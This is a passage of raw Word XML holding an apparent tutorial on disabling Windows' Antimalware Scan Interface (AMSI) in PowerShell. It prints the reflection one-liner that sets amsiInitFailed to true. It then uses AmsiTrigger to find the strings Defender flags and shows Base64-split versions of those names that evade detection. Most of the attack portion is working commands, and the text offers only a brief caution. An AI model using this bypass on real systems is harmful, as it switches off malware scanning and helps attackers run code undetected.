          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> argument specifies that we are not setting the value on an instance of the object, and the </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$true</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> argument is the new value we are setting the field to.</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The reason for setting </w:t>
      </w:r>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amsiInitFailed</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to true is to bypass AMSI detection, which may be used by antivirus or other security software to detect and block potentially malicious PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>commands or scripts. By indicating that the initialization of AMSI has failed, this command prevents AMSI from running and potentially interfering with the execution of PowerShell commands or scripts. It is worth noting, however, that bypassing AMSI can also make it easier for malicious actors to execute code on a system undetected, so caution should be exercised when using this command in practice.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="90EE90"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Running the command</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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and execute the original payload to patch AMSI and check the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spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>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[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)</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As we can see, Windows has identified the command as malicious and blocked it from being executed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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Now we need to identify what part of the payload is getting detected by Defender and triggering it to be marked as malicious.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="90EE90"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>AMSI Trigger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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With the help of </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AMSITrigger.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, we can identify the malicious string in the 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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>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 C:\AMSITrigger&gt;  .\AmsiTrigger_x64.exe</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We can save our payload in a </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, and with the </w:t>
      </w:r>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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag, we can supply the malicious </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>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2"/>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 C:\AMSITrigger&gt;  .\AmsiTrigger_x64.exe -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> test.ps1</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From the output results we can see that it flagged two strings as malicious</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“A m s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> U t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> l s”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“a m s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I n </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> t F a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> l e d”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="90EE90"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Patching AMSI</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After analyzing the strings that caused Windows Defender to block our script, we can now take steps to bypass this security mechanism. Several techniques can be used to evade detection, with one of the simplest and most effective being to encode or encrypt the payload.</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We can do it in the following ways</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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Base64 Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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Hex Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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Reversing The String</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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Concatenation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1"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Now </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> try to modify our original payload using just Base64 encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC0CB"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Base64 Encoding</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Base64 Encoding is a widely used encoding technique that converts binary data into a string of ASCII characters. This method is easy to implement and can be decoded with simple tools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600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A simple Base64 encoding and decoding snippet in PowerShell looks like this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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>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Encoding Payload</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$Text = 'Hello World';$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text);$EncodedText=[Convert]::ToBase64String($Bytes);$EncodedText</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xml:space="preserve"># Decoding </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Paylaod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('SABlAGwAbABvACAAVwBvAHIAbABkAA==')))</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Now we can do the same for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AmsiUtils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>amsiInitFailed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$Text = '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AmsiUtils</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>';$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text);$EncodedText=[Convert]::ToBase64String($Bytes);$EncodedText</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Windows Defender could still detect </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AmsiUtils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> encoded in base64. We can divide this into two pieces and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> them together to avoid getting detected.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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>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Encoding Payload</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$Text = '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Amsi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>';$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text);$EncodedText=[Convert]::ToBase64String($Bytes);$EncodedText</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$Text = '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Utils</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>';$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text);$EncodedText=[Convert]::ToBase64String($Bytes);$EncodedText</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xml:space="preserve"># Decoding </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Paylaod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('QQBtAHMAaQA=')))+$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('VQB0AGkAbABzAA==')))</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We can see this way we have encoded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AmsiUtils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> without triggering Defender</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600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5600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> try the same for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>amsiInitFailed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by splitting it into 3 parts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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5600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>amsi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Failed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numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>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Encoding Payload</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$Text = '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>amsi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>';$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text);$EncodedText=[Convert]::ToBase64String($Bytes);$EncodedText</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$Text = '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Init</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>';$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text);$EncodedText=[Convert]::ToBase64String($Bytes);$EncodedText</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$Text = 'Failed';$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text);$EncodedText=[Convert]::ToBase64String($Bytes);$EncodedText</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xml:space="preserve"># Decoding </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055600C">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Paylaod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('YQBtAHMAaQA=')) + $([System.Text.Encoding]::Unicode.GetString($([System.Convert]::FromBase64String('SQBuAGkAdAA=')))) + $([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RgBhAGkAbABlAGQA'))))</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As we can see, we have encoded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
